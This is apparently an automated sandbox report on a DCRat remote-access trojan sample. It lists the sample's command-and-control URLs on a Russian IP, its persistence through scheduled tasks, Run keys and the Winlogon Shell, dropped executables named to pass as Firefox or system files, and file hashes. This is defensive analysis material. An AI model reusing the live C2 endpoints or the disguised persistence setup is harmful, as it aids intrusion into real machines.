              http://78.24.221.196QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003424000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://78.24.HJcQtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://78.24.2HjQtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://78.24.221.196/destenyserver/QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://78.24.221.196QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003082000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003247000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003434000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://78.24.221.196/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&zjFmmQtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://steamcommunity.com/tradeoffer/new/?partner=1050759327&token=rXa5DHlkQtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://go.mic$QtLimbtNymPOHuXh.exe, 00000010.00000002.2393345408.000000000098E000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://78.24.221.196/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://78.24.2HQtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000003424000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHQtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000003061000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000032EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002F49000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://78.24.221.196:443/destenyserver/serverWindows.php?1h2nLcMsvvX0dx9RWTXYxKza1=YsY0vbXk1H8t4K1&QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.000000000333B000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://78.24.221.196GGQtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000032DF000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.24.221.196NQtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000026E1000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://78.24.221.196/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCIB9&iQtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://78.24.221.196:443/destenyserver/serverWindows.php?vcQl7RBdY8Czx6C=DxNsqNS3rFgUQt95TPLp0dsPTCQtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.000000000273A000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://78.24.221.196/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpQtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003552000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003298000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name7fGdoA6Inq.exe, 00000000.00000002.1734751520.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000F.00000002.2144498609.0000000003171000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.0000000002617000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.0000000003217000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://78.24.HQtLimbtNymPOHuXh.exe, 00000007.00000002.1819598720.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 0000000C.00000002.1900238365.00000000030E3000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000010.00000002.2394977882.00000000029C8000.00000004.00000800.00020000.00000000.sdmp, QtLimbtNymPOHuXh.exe, 00000012.00000002.2635763645.00000000035B1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  78.24.221.196
                  		unknownRussian Federation
                  		29182THEFIRST-ASRUtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1573327
                  Start date and time:2024-12-11 20:46:06 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 38s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:19
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:7fGdoA6Inq.exe
                  renamed because original name is a hash value
                  Original Sample Name:8B744166EECACE320158F4D0F704B13E.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@18/16@0/1
                  EGA Information:
                  • Successful, ratio: 11.1%
                  HCA Information:
                  • Successful, ratio: 91%
                  • Number of executed functions: 301
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target 7fGdoA6Inq.exe, PID 7868 because it is empty
                  • Execution Graph export aborted for target QtLimbtNymPOHuXh.exe, PID 1900 because it is empty
                  • Execution Graph export aborted for target QtLimbtNymPOHuXh.exe, PID 4548 because it is empty
                  • Execution Graph export aborted for target QtLimbtNymPOHuXh.exe, PID 7584 because it is empty
                  • Execution Graph export aborted for target QtLimbtNymPOHuXh.exe, PID 7668 because it is empty
                  • Execution Graph export aborted for target QtLimbtNymPOHuXh.exe, PID 8028 because it is empty
                  • Execution Graph export aborted for target RuntimeBroker.exe, PID 7692 because it is empty
                  • Execution Graph export aborted for target wininit.exe, PID 7716 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: 7fGdoA6Inq.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  14:47:07API Interceptor132x Sleep call for process: QtLimbtNymPOHuXh.exe modified
                  19:47:03Task SchedulerRun new task: QtLimbtNymPOHuXh path: "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                  19:47:03Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe"
                  19:47:03Task SchedulerRun new task: wininit path: "C:\PerfLogs\wininit.exe"
                  19:47:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXh "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                  19:47:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run wininit "C:\PerfLogs\wininit.exe"
                  19:47:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe"
                  19:47:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXh "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                  19:47:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run wininit "C:\PerfLogs\wininit.exe"
                  19:47:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe"
                  19:47:54AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run QtLimbtNymPOHuXh "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                  19:48:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wininit "C:\PerfLogs\wininit.exe"
                  19:48:10AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe"
                  19:48:26AutostartRun: WinLogon Shell "C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe"
                  19:48:34AutostartRun: WinLogon Shell "C:\PerfLogs\wininit.exe"
                  19:48:42AutostartRun: WinLogon Shell "C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe"

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  78.24.221.19699F73547E7A91A490F190ECB9A53106475F9AE550F6B0.exeGet hashmaliciousDCRatBrowse
                    dEXymvVeFF.exeGet hashmaliciousRedLineBrowse

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      fp2e7a.wpc.phicdn.netSHIPPING_DOCUMENT.EXE.exeGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      3194186471068630162.jsGet hashmaliciousStrela DownloaderBrowse
                      • 192.229.221.95
                      file.exeGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      DHL_73482551429387.scr.exeGet hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      https://intelligentrepairsolutions-my.sharepoint.com/:b:/g/personal/a_zell_irs-group_com/ETrGN6yXppBBt5Jzbj4zKhgBq4v6Oyb7O70AESL4N06CfQ?e=4%3aChQOAq&at=9Get hashmaliciousUnknownBrowse
                      • 192.229.221.95
                      dMDImIGmc7.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 192.229.221.95
                      xUPaeKk5wQ.msiGet hashmaliciousAteraAgentBrowse
                      • 192.229.221.95
                      7gBUqzSN3y.msiGet hashmaliciousAteraAgentBrowse
                      • 192.229.221.95
                      PO-8776-2024.jsGet hashmaliciousRemcosBrowse
                      • 192.229.221.95
                      New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                      • 192.229.221.95

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      THEFIRST-ASRUJosho.spc.elfGet hashmaliciousUnknownBrowse
                      • 178.250.157.175
                      https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                      • 185.60.135.47
                      Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 188.120.227.56
                      KyC6hVwU8Z.exeGet hashmaliciousDCRatBrowse
                      • 185.43.5.93
                      gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                      • 185.246.67.73
                      home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                      • 37.230.119.182
                      x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                      • 82.146.62.180
                      sora.mips.elfGet hashmaliciousMiraiBrowse
                      • 62.109.30.187
                      UNFOT5F1qt.exeGet hashmaliciousDCRatBrowse
                      • 188.120.228.203
                      RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                      • 188.120.239.221

                      JA3 Fingerprints

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      fc54e0d16d9764783542f0146a98b300VZ7xFmeuPX.exeGet hashmaliciousUnknownBrowse
                      • 78.24.221.196
                      n3ydjVzUYm.exeGet hashmaliciousCryptOne, VidarBrowse
                      • 78.24.221.196
                      J8igWzSKUw.exeGet hashmaliciousDCRatBrowse
                      • 78.24.221.196
                      6K1uYM85lS.exeGet hashmaliciousPhorpiexBrowse
                      • 78.24.221.196
                      2oK.exeGet hashmaliciousDCRatBrowse
                      • 78.24.221.196
                      EYBfU.exeGet hashmaliciousDCRatBrowse
                      • 78.24.221.196
                      KK63Cn92dU.exeGet hashmaliciousPhonk Miner, XmrigBrowse
                      • 78.24.221.196
                      Yhx3rg6GE4.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                      • 78.24.221.196
                      G3KugQ8kiX.exeGet hashmaliciousPhonk Miner, Xmrig, zgRATBrowse
                      • 78.24.221.196
                      K92v0CujUu.exeGet hashmaliciousParallax RAT, Phonk Miner, XmrigBrowse
                      • 78.24.221.196

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\PerfLogs\560854153607923c4c5f107085a7db67be01f252

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):58
                      Entropy (8bit):5.051862245090271
                      Encrypted:false
                      SSDEEP:3:6mNqiYzeSEVtuJ3QAGYdH:zYKZ7u5Q6H
                      MD5:743CEE739E3371CB5FBACF8993171502
                      SHA1:36B85EE1B70D75CF36DF622BE453CB1D511CB855
                      SHA-256:042C610722EF210C1A2D263DB49D3D9285F52F7BFB2D2B3ECD24AC158FA8F2E4
                      SHA-512:B7BFF52A201EE7EDC1CC6E15118A80857AC80BF6BB599937626EB41490E831C4366978A734124190D458BD2C9A71C77194EB8C7748AB6ADD4B424B2249F18D70
                      Malicious:false
                      Reputation:low
                      Preview:5LNN6cMugLdvoDUI61V5jIKnnve1GTsfysNdYYOAcmQR5ZeMlN5SDqdxAk

                      C:\PerfLogs\wininit.exe

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):2781721
                      Entropy (8bit):5.8972283510043395
                      Encrypted:false
                      SSDEEP:24576:l+O4GuNVHU+AH2FWxOYIOlIZBrlsQBYI63DSyve5fG:s3N5IO6OtsMYIxS
                      MD5:8B744166EECACE320158F4D0F704B13E
                      SHA1:B92636084B3BD914514BC44556C4803933D667A3
                      SHA-256:AA7A05956CA47E164A10A94D0BDBE01123B84EB01FAD5E581E1E72B10D93D5A9
                      SHA-512:641B3065E30186CCF9BA84CE6D345565763BBDB5FC1B1201C3F08FCE5466C2384250B85B4C0220D2B9E21C5A51FF5EF60E9B910E07107E2B7E06F97B4E429D27
                      Malicious:true
                      Yara Hits:
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\PerfLogs\wininit.exe, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 88%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.........."......j*..........*.. ....*...@.. ........................*.......*...@...................................*.O.....*.......................*...................................................... ............... ..H............text....i*.. ...j*................. ..`.rsrc.........*......l*.............@..@.reloc........*......p*.............@..B..................*.....H.............&.................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                      C:\PerfLogs\wininit.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Program Files\Mozilla Firefox\733f5148eb4a0e104b3ec895f92fbabca269cbcc

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with very long lines (670), with no line terminators
                      Category:dropped
                      Size (bytes):670
                      Entropy (8bit):5.904091789694425
                      Encrypted:false
                      SSDEEP:12:iOw56EVjVD5bbbXurOKyv2idwtp6fFlcAvBnm5w4n/1UlJJjRQ+:iNR5bvXuny+idw303c4nm5z/1UPQ+
                      MD5:BED380F35F5E69C6B1A9F2AFE1DD9372
                      SHA1:826F947F69A404C7C14F5D78414C501E69B54333
                      SHA-256:F2150D43B43B6C990A9AC1CAC0C1E23FA64C397D5A0F490FEBDC6009DFA20BE7
                      SHA-512:4FD315CC69032593E164973DABD22D470F82DBC73DB9BBEB8FCA6ECF1AC407137F55DF0C28DCA2D4D15AAF3A2E11FCF481D57BAA1810DA5F47584AC3E14AF618
                      Malicious:false
                      Preview:ccAgB5GEQO12nELM2YZbaOGCQIkb3B2OAH3diomaMuQlRzN1zgpzk4ONW7P2VpLOWm2gLrnNv9Oq8evb5slXVCnF2qHlZuEhjBPo6rqI2cElpiP1Ly7mDy3T9wnekCyB4rG6OGeOCde38BaTbPZkwcevI6pKDLh0nCr8bSnFUtkjTAV7WTDUmOOcNVySbTK05nQ5Uc2ImUPD14bHksytINOYyPvFeUoAitoquan3b4rR8LkS4qrsfbssZ1GErwoSqPeHQuXKF4RNf6anocLyn5eHB5R2TiMpQZltqcCJSgnlJeMcbdaPk0ovuXGUde1hrm6FVr6MZBfGR38gsybzI7Eauz8TWsqxpG3ghGGuhOzjVid1YjloDBYuigVfsmzrVraL9b8msqR4HfFLWG4wGBunrJ8BvlB4YINnIS17l96WtemDbJJmsClU7xd0d70HpXf9RbDEO7LGFX3Mg4jmbZMWg2qUyBenJzrW9mvAFFXu0ePj3QTiXOpQKJcZusPNdi7PqgN3JjgWBbfCnGbhr5P4JbMzKWPWzKRSh93WDZYysTOsoavnRrfhSCGOUXtxTJg1KMeoNEeRhaM0MdLtklFHouAe2oCpqkfixXib6HaMNN91zQC1MANrEYMZM9viCyl65oCy4txcL24avJommKdpXxdZLJ

                      C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):2781721
                      Entropy (8bit):5.8972283510043395
                      Encrypted:false
                      SSDEEP:24576:l+O4GuNVHU+AH2FWxOYIOlIZBrlsQBYI63DSyve5fG:s3N5IO6OtsMYIxS
                      MD5:8B744166EECACE320158F4D0F704B13E
                      SHA1:B92636084B3BD914514BC44556C4803933D667A3
                      SHA-256:AA7A05956CA47E164A10A94D0BDBE01123B84EB01FAD5E581E1E72B10D93D5A9
                      SHA-512:641B3065E30186CCF9BA84CE6D345565763BBDB5FC1B1201C3F08FCE5466C2384250B85B4C0220D2B9E21C5A51FF5EF60E9B910E07107E2B7E06F97B4E429D27
                      Malicious:true
                      Yara Hits:
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 88%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.........."......j*..........*.. ....*...@.. ........................*.......*...@...................................*.O.....*.......................*...................................................... ............... ..H............text....i*.. ...j*................. ..`.rsrc.........*......l*.............@..@.reloc........*......p*.............@..B..................*.....H.............&.................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                      C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\7fGdoA6Inq.exe.log

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1969
                      Entropy (8bit):5.37489905566343
                      Encrypted:false
                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
                      MD5:40B0737D9E519BE2FAE92D41EE16B42F
                      SHA1:57A1EE0799583C2FDFE12AB3721B872A7B669D97
                      SHA-256:3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
                      SHA-512:EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
                      Malicious:true
